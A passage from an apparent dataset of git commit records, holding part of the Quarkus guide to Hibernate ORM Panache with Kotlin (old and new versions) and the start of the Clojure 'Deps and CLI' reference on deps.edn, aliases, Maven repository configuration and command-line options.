familiar framework. This guide will not dive in to the specifics of either as those are already\ncovered in the link:hibernate-orm-panache.adoc[Panache guide]. In this guide, we'll cover the Kotlin specific changes\nneeded to use Panache in your Kotlin-based Quarkus applications.\n\n== First: an example\n\nAs we saw in the Panache guide, Panache allows us to extend the functionality in our entities and repositories (also known as DAOs) with some automatically\nprovided functionality. When using Kotlin, the approach is very similar to what we see in the Java version with a slight\nchange or two. To Panache-enable your entity, you would define it something like:\n\n[source,kotlin]\n----\n@Entity\nclass Person: PanacheEntity {\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\nAs you can see our entities remain simple. There is, however, a slight difference from the Java version. The Kotlin\nlanguage doesn't support the notion of static methods in quite the same way as Java does. Instead, we must use a\n[companion object](https:\/\/kotlinlang.org\/docs\/tutorials\/kotlin-for-py\/objects-and-companion-objects.html#companion-objects):\n\n[source,kotlin]\n----\n@Entity\nclass Person : PanacheEntity {\n companion object: PanacheCompanion<Person> { \/\/ <1>\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n }\n\n lateinit var name: String \/\/ <2>\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n<1> The companion object holds all the methods not related to a specific instance allowing for general management and\nquerying bound to a specific type.\n<2> Here there are options, but we've chosen the `lateinit` approach. This allows us to declare these fields as non-null\nknowing they will be properly assigned either by the constructor (not shown) or by hibernate loading data from the\ndatabase.\n\nNOTE: These types differ from the Java types mentioned in those tutorials. For Kotlin support, all the Panache\ntypes will be found in the `io.quarkus.hibernate.orm.panache.kotlin` package. This subpackage allows for the distinction\nbetween the Java and Kotlin variants and allows for both to be used unambiguously in a single project.\n\nIn the Kotlin version, we've simply moved the bulk of the link:https:\/\/www.martinfowler.com\/eaaCatalog\/activeRecord.html[`active record pattern`]\nfunctionality to the `companion object`. Apart from this slight change, we can then work with our types in ways that map easily\nfrom the Java side of world.\n\n\n== Using the repository pattern\n\n\n=== Defining your entity\n\nWhen using the repository pattern, you can define your entities as regular JPA entities.\n[source,kotlin]\n----\n@Entity\nclass Person {\n @Id\n @GeneratedValue\n var id: Long? = null;\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\n=== Defining your repository\n\nWhen using Repositories, you get the exact same convenient methods as with the active record pattern, injected in your Repository,\nby making them implement `PanacheRepository`:\n\n[source,kotlin]\n----\nclass PersonRepository: PanacheRepository<Person> {\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n}\n----\n\nAll the operations that are defined on `PanacheEntityBase` are available on your repository, so using it\nis exactly the same as using the active record pattern, except you need to inject it:\n\n[source,kotlin]\n----\n@Inject\nlateinit var personRepository: PersonRepository\n\n@GET\nfun count() = personRepository.count()\n----\n\n=== Most useful operations\n\nOnce you have written your repository, here are the most common operations you will be able to perform:\n\n[source,kotlin]\n----\n\/\/ creating a person\nvar person = Person()\nperson.name = \"Stef\"\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1)\nperson.status = Status.Alive\n\n\/\/ persist it\npersonRepository.persist(person)\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(personRepository.isPersistent(person)){\n \/\/ delete it\n personRepository.delete(person)\n}\n\n\/\/ getting a list of all Person entities\nval allPersons = personRepository.listAll()\n\n\/\/ finding a specific person by ID\nperson = personRepository.findById(personId) ?: throw Exception(\"No person with that ID\")\n\n\/\/ finding all living persons\nval livingPersons = personRepository.list(\"status\", Status.Alive)\n\n\/\/ counting all persons\nval countAll = personRepository.count()\n\n\/\/ counting all living persons\nval countAlive = personRepository.count(\"status\", Status.Alive)\n\n\/\/ delete all living persons\npersonRepository.delete(\"status\", Status.Alive)\n\n\/\/ delete all persons\npersonRepository.deleteAll()\n\n\/\/ delete by id\nval deleted = personRepository.deleteById(personId)\n\n\/\/ set the name of all living persons to 'Mortal'\npersonRepository.update(\"name = 'Mortal' where status = ?1\", Status.Alive)\n\n----\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,kotlin]\n----\nval persons = personRepository.streamAll();\nval namesButEmmanuels = persons\n .map { it.name.toLowerCase() }\n .filter { it != \"emmanuel\" }\n----\n\nNOTE: The `stream` methods require a transaction to work.\n\nNOTE: The rest of the documentation show usages based on the active record pattern only,\nbut keep in mind that they can be performed with the repository pattern as well.\nThe repository pattern examples have been omitted for brevity.\n\nFor more examples, please consult the link:hibernate-orm-panache[Java version] for complete details. Both APIs\nare the same and work identically except for some Kotlin-specific tweaks to make things feel more natural to\nKotlin developers. These tweaks include things like better use of nullability and the lack of `Optional` on API\nmethods.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started using Panache with Kotlin, you can, generally, follow the steps laid out in the Java tutorial. The biggest\nchange to configuring your project is the Quarkus artifact to include. You can, of course, keep the Java version if you\nneed but if all you need are the Kotlin APIs then include the following dependency instead:\n\n[source,xml]\n----\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache-kotlin<\/artifactId> \/\/ <1>\n <\/dependency>\n<\/dependencies>\n----\n<1> Note the addition of `-kotlin` on the end. Generally you'll only need this version but if your project will be using\nboth Java and Kotlin code, you can safely include both artifacts.\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache and Kotlin\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto standard JPA implementation and is well-known in the Java ecosystem. Panache offers a\nnew layer atop this familiar framework. This guide will not dive in to the specifics of either as those are already\ncovered in the link:hibernate-orm-panache.adoc[Panache guide]. In this guide, we'll cover the Kotlin specific changes\nneeded to use Panache in your Kotlin-based Quarkus applications.\n\n== First: an example\n\nAs we saw in the Panache guide, Panache allows us to extend the functionality in our entities and repositories (also known as DAOs) with some automatically\nprovided functionality. When using Kotlin, the approach is very similar to what we see in the Java version with a slight\nchange or two. To Panache-enable your entity, you would define it something like:\n\n[source,kotlin]\n----\n@Entity\nclass Person: PanacheEntity {\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\nAs you can see our entities remain simple. There is, however, a slight difference from the Java version. The Kotlin\nlanguage doesn't support the notion of static methods in quite the same way as Java does. Instead, we must use a\n[companion object](https:\/\/kotlinlang.org\/docs\/tutorials\/kotlin-for-py\/objects-and-companion-objects.html#companion-objects):\n\n[source,kotlin]\n----\n@Entity\nclass Person : PanacheEntity {\n companion object: PanacheCompanion<Person> { \/\/ <1>\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n }\n\n lateinit var name: String \/\/ <2>\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n<1> The companion object holds all the methods not related to a specific instance allowing for general management and\nquerying bound to a specific type.\n<2> Here there are options, but we've chosen the `lateinit` approach. This allows us to declare these fields as non-null\nknowing they will be properly assigned either by the constructor (not shown) or by hibernate loading data from the\ndatabase.\n\nNOTE: These types differ from the Java types mentioned in those tutorials. For kotlin support, all the Panache\ntypes will be found in the `io.quarkus.hibernate.orm.panache.kotlin` package. This subpackage allows for the distinction\nbetween the Java and Kotlin variants and allows for both to be used unambiguously in a single project.\n\nIn the Kotlin version, we've simply moved the bulk of the link:https:\/\/www.martinfowler.com\/eaaCatalog\/activeRecord.html[`active record pattern`]\nfunctionality to the `companion object`. Apart from this slight change, we can then work with our types in ways that map easily\nfrom the Java side of world.\n\n\n== Using the repository pattern\n\n\n=== Defining your entity\n\nWhen using the repository pattern, you can define your entities as regular JPA entities.\n[source,kotlin]\n----\n@Entity\nclass Person {\n @Id\n @GeneratedValue\n var id: Long? = null;\n lateinit var name: String\n lateinit var birth: LocalDate\n lateinit var status: Status\n}\n----\n\n=== Defining your repository\n\nWhen using Repositories, you get the exact same convenient methods as with the active record pattern, injected in your Repository,\nby making them implement `PanacheRepository`:\n\n[source,kotlin]\n----\nclass PersonRepository: PanacheRepository<Person> {\n fun findByName(name: String) = find(\"name\", name).firstResult()\n fun findAlive() = list(\"status\", Status.Alive)\n fun deleteStefs() = delete(\"name\", \"Stef\")\n}\n----\n\nAll the operations that are defined on `PanacheEntityBase` are available on your repository, so using it\nis exactly the same as using the active record pattern, except you need to inject it:\n\n[source,kotlin]\n----\n@Inject\nlateinit var personRepository: PersonRepository\n\n@GET\nfun count() = personRepository.count()\n----\n\n=== Most useful operations\n\nOnce you have written your repository, here are the most common operations you will be able to perform:\n\n[source,kotlin]\n----\n\/\/ creating a person\nvar person = Person()\nperson.name = \"Stef\"\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1)\nperson.status = Status.Alive\n\n\/\/ persist it\npersonRepository.persist(person)\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(personRepository.isPersistent(person)){\n \/\/ delete it\n personRepository.delete(person)\n}\n\n\/\/ getting a list of all Person entities\nval allPersons = personRepository.listAll()\n\n\/\/ finding a specific person by ID\nperson = personRepository.findById(personId) ?: throw Exception(\"No person with that ID\")\n\n\/\/ finding all living persons\nval livingPersons = personRepository.list(\"status\", Status.Alive)\n\n\/\/ counting all persons\nval countAll = personRepository.count()\n\n\/\/ counting all living persons\nval countAlive = personRepository.count(\"status\", Status.Alive)\n\n\/\/ delete all living persons\npersonRepository.delete(\"status\", Status.Alive)\n\n\/\/ delete all persons\npersonRepository.deleteAll()\n\n\/\/ delete by id\nval deleted = personRepository.deleteById(personId)\n\n\/\/ set the name of all living persons to 'Mortal'\npersonRepository.update(\"name = 'Mortal' where status = ?1\", Status.Alive)\n\n----\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,kotlin]\n----\nval persons = personRepository.streamAll();\nval namesButEmmanuels = persons\n .map { it.name.toLowerCase() }\n .filter { it != \"emmanuel\" }\n----\n\nNOTE: The `stream` methods require a transaction to work.\n\nNOTE: The rest of the documentation show usages based on the active record pattern only,\nbut keep in mind that they can be performed with the repository pattern as well.\nThe repository pattern examples have been omitted for brevity.\n\nFor more examples, please consult the link:hibernate-orm-panache.adoc[java version] for complete details. Both APIs\nare the same and work identically except for some kotlin-specific tweaks to make things feel more natural to\nKotlin developers. These tweaks include things like better use of nullability and the lack of `Optional` on API\nmethods.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started using Panache with Kotlin, you can, generally, follow the steps laid out in the Java tutorial. The biggest\nchange to configuring your project is the Quarkus artifact to include. You can, of course, keep the Java version if you\nneed but if all you need are the Kotlin APIs then include the following dependency instead:\n\n[source,xml]\n----\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache-kotlin<\/artifactId> \/\/ <1>\n <\/dependency>\n<\/dependencies>\n----\n<1> Note the addition of `-kotlin` on the end. Generally you'll only need this version but if your project will be using\nboth java and kotlin code, you can safely include both artifacts.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59cc2a6647cd55da3b8d0c5fe762bd81f3798323","subject":"fix header","message":"fix header\n","repos":"clojure\/clojure-site","old_file":"content\/reference\/deps_and_cli.adoc","new_file":"content\/reference\/deps_and_cli.adoc","new_contents":"= Deps and CLI\nAlex Miller\n2017-11-30\n:type: reference\n:toc: macro\n:icons: font\n:prevpagehref: lisps\n:prevpagetitle: Differences with Lisps\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\n== Rationale\n\nClojure \"endeavors to be a general-purpose language suitable in those areas where Java is suitable\" (from <<xref\/..\/..\/about\/rationale#,Rationale>>). To effectively target the JVM platform, Clojure needs to provide ready access to Java libraries, ideally in a way suited for dynamic development. In practice, this means meeting the JVM platform in two places:\n\n* the classpath used when invoking JVM processes (and\/or URLClassLoaders)\n* transitive dependency download and resolution from providers like Maven\n\nClojure build tools have traditionally taken the approach of wrapping the Maven ecosystem to gain access to Java libraries. However, they have also forced this approach on Clojure code as well, requiring a focus on artifacts that must be built and deployed (which Clojure does not require). This approach has created friction for Clojure developers, making it hard to e.g. work with libs not yet publishing artifacts, work on speculative changes w\/o artifacts or across multiple libs, or give control to a 3rd party to manage shared dependencies.\n\nClojure provides:\n\n* https:\/\/github.com\/clojure\/tools.deps.alpha[tools.deps.alpha] - a library providing a functional API for resolving dependency graphs and building classpaths that can utilize both Maven and other providers of code or artifacts\n* Command line tools (`clojure` and `clj`) that enable users to make use of this capability at the terminal to declare dependencies, assemble classpaths, and launch Clojure programs\n* System-specific installers for downloading the tools, improving the \"Getting Started\" experience\n\n== Building classpaths with tools.deps.alpha\n\nThe JVM classpath consists of a series of roots, either directory paths or the path to a jar file. Classes (and Clojure files) map via package or namespace to a path relative to a classpath root. For example, the `java.lang.String` class can be found at path `java\/lang\/String.class` and the `clojure.set` Clojure namespace may be found at paths `clojure\/set.class` (for AOT), `clojure\/set.clj`, or `clojure\/set.cljc`. When the JVM needs to load one of these files it searches each root for the relative path and loads it when found.\n\nWe divide the process of building a classpath into two primary operations: `resolve-deps` and `make-classpath`. Below is a high-level view of this process:\n\n\nimage::\/images\/content\/guides\/deps\/deps.png[\"Dep Tools\", link=\"\/images\/content\/guides\/deps\/deps.png\"]\n\n=== resolve-deps\n\n**`(resolve-deps deps args-map)`**\n\n`resolve-deps` takes an initial map of required dependencies and a map of args that modify the resolution process. It builds a full graph of transitive dependencies, resolves any version differences, and flattens that graph to a full list of dependencies required in the classpath.\n\nThe deps are a map of library to coordinate. The library is (in Maven terms) the groupId and artifactId, which are sufficient to locate the desired project. The coordinate is used to describe a particular version that is being requested from a particular provider (like Maven).\n\nFor example, this deps map specifies a (Maven-based) dependency:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\"}}\n----\n\n`resolve-deps` expands these dependencies to include all transitive dependencies, cut cycles, resolve version differences, download required artifacts from the provider, and produce a *lib map* of the flattened set of all needed dependencies and where to find their artifacts:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\",\n :deps\/manifest :mvn,\n :paths [\"...\/core.cache-0.6.5.jar\"]}\n org.clojure\/data.priority-map {:mvn\/version \"0.0.7\",\n :deps\/manifest :mvn,\n :dependents [org.clojure\/core.cache],\n :paths [\"...\/data.priority-map-0.0.7.jar\"]} \n ... }\n----\n\nThe lib map lists all libraries, their selected coordinates, the `:paths` on disk, and a list of dependents that caused it to be included. Here you can see that `data.priority-map` was included as a dependency of core.cache.\n\nThe second `args-map` is a map of optional modifications to the standard expansion to account for common use cases: adding extra dependencies, overriding deps, and default deps. These can be used separately or together, or not at all:\n\n[source,clojure]\n----\n{:extra-deps { ... }\n :override-deps { ... }\n :default-deps { ... }}\n----\n\n`:extra-deps` is the most common modification - it allows you to optionally add extra dependencies to the base dependency set. The value is a map of library to coordinate:\n\n[source,clojure]\n----\n{:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n----\n\n`:override-deps` overrides the coordinate version chosen by the version resolution to force a particular version instead. This also takes a map of library to coordinate:\n\n[source,clojure]\n----\n{:override-deps {org.clojure\/clojure {:mvn\/version \"1.9.0\"}}}\n----\n\n`:default-deps` provides a set of default coordinate versions to use if no coordinate is specified. The default deps can be used across a set of shared projects to act as a dependency management system:\n\n[source,clojure]\n----\n{:default-deps {org.clojure\/core.cache {:mvn\/version \"0.6.4\"}}}\n----\n\n=== make-classpath\n\n**`(make-classpath lib-map paths args-map)`**\n\nThe `make-classpath` step takes the lib map (the result of `resolve-deps`), the internal source paths of the project `[\"src\"]`, an args-map of optional modifications, and produces a classpath string for use in the JVM.\n\nThe args-map includes support for modifications to be applied while making the classpath: adding extra paths, and overriding the location of libraries specified in the lib map. These modifications can be used separately or together or not at all in a map like this:\n\n[source,clojure]\n----\n{:extra-paths [ ... ]\n :classpath-overrides { ... }}\n----\n\n`:extra-paths` is used to include source paths in addition to your standard source paths, for example to include directories of test source:\n\n[source,clojure]\n----\n{:extra-paths [\"test\" \"resources\"]}\n----\n\n`:classpath-overrides` specify a location to pull a dependency that overrides the path found during dependency resolution, for example to replace a dependency with a local debug version. Many of these use cases are ones where you would be tempted to prepend the classpath to \"override\" something else.\n\n[source,clojure]\n----\n{:classpath-overrides \n {org.clojure\/clojure \"\/my\/clojure\/target\"}}\n----\n\n== Command line tools\n\n=== Directories\n\nThe tools rely on several directories and optionally on several environment variables.\n\n* Installation directory\n** Created during installation\n** Contents:\n*** `bin\/clojure` - main tool\n*** `bin\/clj` - wrapper for interactive repl use (uses `rlwrap`)\n*** `deps.edn` - install level deps.edn file, with some default deps (Clojure, etc) and provider config\n*** `example-deps.edn` - commented example that gets copied to `<config_dir>\/deps.edn`\n*** `libexec\/clojure-tools-X.Y.Z.jar` - uberjar invoked by `clojure` to construct classpaths\n* Config directory\n** Holds a deps.edn file that persists across tool upgrades and affects all projects\n** Locations used in this order:\n*** If `$CLJ_CONFIG` is set, then use `$CLJ_CONFIG` (explicit override)\n*** If `$XDG_CONFIG_HOME` is set, then use `$XDG_CONFIG_HOME\/clojure` (Freedesktop conventions)\n*** Else use `$HOME\/.clojure` (most common)\n** Contents:\n*** `deps.edn` - user deps file, defines default Clojure version and provider defaults\n* Cache directory\n** Lazily created when `clojure` is invoked without a local `deps.edn` file. Locations used in this order:\n*** If `$CLJ_CACHE` is set, then use `$CLJ_CACHE` (explicit override)\n*** If `$XDG_CACHE_HOME` is set, then use `$XDG_CACHE_HOME\/clojure` (Freedesktop conventions)\n*** Else use `config_dir\/.cpcache` (most common)\n* Project directory\n** The current directory\n** Contents:\n*** `deps.edn` - optional project deps\n*** `.cpcache` - project cache directory, same as the user-level cache directory, created if there is a `deps.edn`\n\n=== deps.edn\n\nThe configuration file format (in \"deps.edn\" files) is an edn map with top-level keys for `:deps`, `:paths`, and `:aliases`, plus provider-specific keys for configuring dependency sources.\n\nAfter installation, deps.edn configuration files can be found in (up to) three locations:\n\n- installation directory - created only at install time\n- config directory (often ~\/.clojure) - modified to change cross-project (or no-project) defaults\n- the local directory - per-project settings\n\nThe `deps.edn` files in each of these locations (if they exist) are merged to form one combined dependency configuration. The merge is done in the order above install\/config\/local, last one wins. The operation is essentially `merge-with merge`, except for the `:paths` key, where only the last one found is used (they are not combined).\n\nYou can use the `-Sverbose` option to see all of the actual directory locations.\n\n=== Dependencies\n\nDependencies are declared in deps.edn with a top level key `:deps` - a map from library to coordinate. Libraries are symbols of the form <groupID>\/<artifactId> or simply <id> if the group and artifact ID are the same. To indicate a classifier, use <groupId>\/<artifactId>$<classifier>. \n\nCoordinates can take several forms depending on the coordinate type:\n\n* Maven coordinate: `{:mvn\/version \"1.2.3\"}`\n** Other optional keys: `:extension`, `:exclusions`\n** Note: `:classifier` is no longer supported - add to lib name as specified above\n* Local project coordinate: `{:local\/root \"\/path\/to\/project\"}`\n** Optional key `:deps\/manifest`\n*** Specifies the project manifest type\n*** Default is to auto-detect the project type (currently either `:deps` or `:pom`)\n* Local jar: `{:local\/root \"\/path\/to\/file.jar\"}`\n** If the jar has been packaged with a pom.xml file, the pom will be read and used to find transitive deps\n* Git coordinate: `{:git\/url \"https:\/\/github.com\/user\/project.git\", :sha \"sha\", :tag \"tag\"}`\n** Required key `:git\/url` can be one of the following:\n*** https - secure anonymous access to public repos\n*** ssh or user@host form urls (including GitHub) - ssh-based access (see Git configuration section)\n** Required key `:sha` should indicate the full commit sha\n** Optional key `:tag` is used only to indicate the semantics of the sha\n** Optional key `:deps\/root`\n*** Specifies the relative path within the root to search for the manifest file\n** Optional key `:deps\/manifest` - same as in `:local` deps\n\n[source,clojure]\n----\n{:deps\n {org.clojure\/tools.reader {:mvn\/version \"1.1.1\"}\n github-sally\/awesome {:git\/url \"https:\/\/github.com\/sally\/awesome.git\", :sha \"123abcd549214b5cba04002b6875bdf59f9d88b6\"}\n ;; ... add more here\n }}\n----\n\n=== Paths\n\nPaths are declared in a top level key `:paths` and is a vector of string paths (typically relative to the project root). These source paths will be included on the classpath.\n\nWhile dependency sets are merged across all of the configuration files, only the last paths found in one of the config files is used, prior ones are ignored.\n\n[source,clojure]\n----\n{:paths [\"src\"]}\n----\n\n=== Aliases\n\nAliases give a name to a data structure that can be used either by the Clojure tool itself or other consumers of deps.edn. They are defined in the `:aliases` section of the config file. These Clojure tool flags use the following well-known alias keys:\n\n* -R - uses these keys when expanding deps during `resolve-deps`:\n** `:extra-deps` - a deps map from lib to coordinate of deps to add to the deps\n** `:override-deps` - a deps map from lib to coordinate of override versions to use\n** `:default-deps` - a deps map from lib to coordinate of versions to use if none is found\n** If multiple alias maps with these keys are activated, all of them are merge-with merged\n* -C - uses these keys when creating the classpath during `make-classpath`:\n** `:extra-paths` - a collection of string paths to add to `:paths`\n** `:classpath-overrides` - a map of lib to string path to replace the location of the lib\n** If multiple maps with these keys are activated, `:extra-paths` concatenate and `:classpath-overrides` merge-with merge\n* -O - uses these keys when constructing the final command JVM options:\n** `:jvm-opts` - a collection of string JVM options\n** If multiple maps with these keys are activated, `:jvm-opts` concatenate\n** If -J JVM options are also specified on the command line, they are concatenated after the alias options\n* -M - uses these keys when constructing the final command clojure.main arguments:\n** `:main-opts` - a collection of clojure.main options\n** If multiple maps with these keys are activated, only the last one will be used\n** If command line clojure.main arguments are supplied on the command line, they are concatenated after the last main alias map\n* -A - activates all of the keys above, also these keys are only supported with -A:\n** `:deps` - a deps map from lib to coordinate of deps to REPLACE the project `:deps`\n** `:paths` a collection of string paths to REPLACE project `:paths`\n\nSo given a deps.edn like:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :deps {}\n :aliases\n {:1.7 {:override-deps {org.clojure\/clojure {:mvn\/version \"1.7.0\"}}}\n :bench {:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n :test {:extra-paths [\"test\"]}}}\n----\n\nYou can activate all three aliases to create a classpath that switches to an older Clojure version, adds the benchmarking library, and includes the test directory in the classpath to see how it changes the classpath:\n\n[source]\n----\nclj -R:1.7:bench -C:test -Spath\n----\n\nYou can use -A to include all types of aliases or define aliases that cross multiple alias types:\n\n[source]\n----\nclj -A:1.7:bench:test -Spath\n----\n\n=== Procurers\n\nCoordinates are interpreted by procurers, which know how to determine dependencies for a library and download artifacts. tools.deps.alpha is designed to support an extensible set of procurers that can expand over time. Currently the available procurers are: `mvn`, `local`, and `git`.\n\nThe procurer to use is determined by examining the attributes of the coordinate and using the first attribute qualifier that's found (ignoring the reserved qualifier \"deps\"). For example, a Maven coordinate contains a `:mvn\/version` attribute and a local coordinate contains a `:local\/root` attribute.\n\nProcurers may also have configuration attributes stored at the root of the configuration map under the same qualifier. The `mvn` procurer will look for `:mvn\/repos`. The installation deps.edn configures the default Maven repos:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"central\" {:url \"https:\/\/repo1.maven.org\/maven2\/\"}\n \"clojars\" {:url \"https:\/\/clojars.org\/repo\"}}}\n----\n\n==== Maven authenticated repos\n\nFor Maven deps in authenticated repositories, existing Maven infrastructure is used to convey credentials.\n\nIn your `~\/.m2\/settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-auth-repo<\/id>\n <username>zango<\/username>\n <password>123<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThen in your `deps.edn` include a repo with a name matching the server id (here `my-auth-repo`):\n\n[source,clojure]\n----\n{:deps\n {authenticated\/dep {:mvn\/version \"1.2.3\"}}\n :mvn\/repos\n {\"my-auth-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThen just refer to your dependencies as usual in the `:deps`.\n\n==== Maven S3 repos\n\nThe tools also provide support for connecting to public and private S3 Maven repositories.\n\nAdd a `:mvn\/repos` that includes the s3 repository root:\n\n[source,clojure]\n----\n{:deps\n {my.library {:mvn\/version \"0.1.2\"}}\n :mvn\/repos\n {\"my-private-repo\" {:url \"s3:\/\/my-bucket\/maven\/releases\"}}}\n----\n\nS3 buckets are specific to the AWS region they were created in. The s3 transporter will attempt to determine the bucket's location. If that doesn't work, you can specify the bucket region in the url explicitly: `\"s3:\/\/my-bucket\/maven\/releases?region-us-west-2\"`.\n\nFor authenticated repos, AWS credentials can be set in the `~\/.m2\/settings.xml` on a per-server basis or will be loaded ambiently from the AWS credential chain (env vars, etc). The repository name in `deps.edn` must match the server id in `settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-private-repo<\/id>\n <username>AWS_ACCESS_KEY_HERE<\/username>\n <password>AWS_SECRET_ACCESS_KEY_HERE<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nAWS S3 credentials can be set in the environment using one of these mechanisms:\n\n1. Set the environment variables `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`.\n2. Create a default profile in the AWS credentials file `~\/.aws\/credentials` (older `~\/.aws\/config` also supported).\n3. Create a named profile in the AWS credentials file and set the environment variable `AWS_PROFILE` with its name.\n4. Amazon ECS container and instance profile credentials should also work, but have not been tested.\n\nFor more information, most of the advice in https:\/\/docs.aws.amazon.com\/sdk-for-java\/v1\/developer-guide\/credentials.html[this AWS document] describes how credentials are located. Note however that the Java system properties options will NOT work with the command line tools (but would work if using the tools.deps.alpha library directly).\n\n==== Maven proxies\n\nIn environments where the internet is accessed via a proxy, existing Maven configuration in `~\/.m2\/settings.xml` is used to set up the proxy connection:\n\n[source,xml]\n----\n<settings>\n ...\n <proxies>\n <proxy>\n <id>my-proxy<\/id>\n <host>proxy.my.org<\/host>\n <port>3128<\/port>\n <nonProxyHosts>localhost|*.my.org<\/nonProxyHosts>\n <\/proxy>\n <\/proxies>\n ...\n<\/settings>\n----\n\nRefer to the Maven https:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Guide to using proxies] for further details.\n\n==== Maven HTTP headers\n\nFor adding custom headers to outgoing HTTP requests, existing Maven configuration in `~\/.m2\/settings.xml` is used.\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-token-repo<\/id>\n <configuration>\n <httpHeaders>\n <property>\n <name>Private-Token<\/name>\n <value>abc123<\/value>\n <\/property>\n <\/httpHeaders>\n <\/configuration>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThe server id in `settings.xml` must match the repository name in `deps.edn`:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"my-token-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThis mechanism is used by repositories that authenticate using a token, rather than by username and password.\n\n==== Git configuration\n\nThe supported git url protocols are https and ssh. https repos will be accessed anonymously and require no additional authentication information. This approach is recommended for public repos.\n\nssh repos may be either public or private. Access to a git repo via ssh requires an ssh keypair. The private key of this keypair may or may not have a passphrase. ssh authentication works by connecting to the local ssh agent (ssh-agent on *nix or Pageant via PuTTY on Windows).\nThe ssh-agent must have a registered identity for the key being used to access the Git repository.\nTo check whether you have registered identities, use:\n\n[source,shell]\n----\n$ ssh-add -l\n2048 SHA256:S2SMY1YRTRFg3sqsMy1eTve4ag78XEzhbzzdVxZroDk \/Users\/me\/.ssh\/id_rsa (RSA)\n----\n\nwhich should return one or more registered identities, typically the one at `~\/.ssh\/id_rsa`.\n\nFor more information on creating keys and using the ssh-agent to manage your ssh identities, GitHub provides excellent info:\n\n* https:\/\/help.github.com\/articles\/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent\/\n* https:\/\/help.github.com\/articles\/working-with-ssh-key-passphrases\/\n\n_Note: user\/password authentication is not supported for any protocol._\n\n=== Usage\n\nUsage:\n\n* `clojure [dep-opt*] [init-opt*] [main-opt] [arg*]`\n* `clj [dep-opt*] [init-opt*] [main-opt] [arg*]`\n\nThe clojure tool is a runner for Clojure. clj is a wrapper for interactive repl use. These tools ultimately construct and invoke a command-line of the form:\n\n`java [java-opt*] -cp classpath clojure.main [init-opt*] [main-opt] [arg*]`\n\nThe dep-opts are used to build the java-opts and classpath:\n\n----\n-Jopt Pass opt through in java_opts, ex: -J-Xmx512m\n-Ralias... Concatenated resolve-deps aliases, ex: -R:bench:1.9\n-Calias... Concatenated make-classpath aliases, ex: -C:dev\n-Oalias... Concatenated jvm option aliases, ex: -O:mem\n-Malias... Concatenated clojure.main option aliases, ex: -M:myapp\n-Aalias... Concatenated aliases of any type\n-Sdeps DEPS Deps data to use as the final deps file\n-Spath Compute classpath and echo to stdout only\n-Scp CP Do NOT compute or cache classpath, use this one instead\n-Srepro Ignore the ~\/.clojure\/deps.edn config file\n-Sforce Force recomputation of the classpath (don't use the cache)\n-Spom Generate (or update an existing) pom.xml with deps and paths\n-Stree Print dependency tree\n-Sresolve-tags Resolve git coordinate tags to shas and update deps.edn\n-Sverbose Print important path info to console\n-Sdescribe Print environment and command parsing info as data\n----\n\ninit-opt:\n\n----\n-i, --init path Load a file or resource\n-e, --eval string Eval exprs in string; print non-nil values\n----\n\nmain-opt:\n\n----\n-m, --main ns-name Call the -main function from namespace w\/args\n-r, --repl Run a repl\npath Run a script from a file or resource\n- Run a script from standard input\n-h, -?, --help Print this help message and exit\n----\n\n=== Classpath construction\n\nThe following process is used to construct the classpath for invoking clojure.main:\n\n* 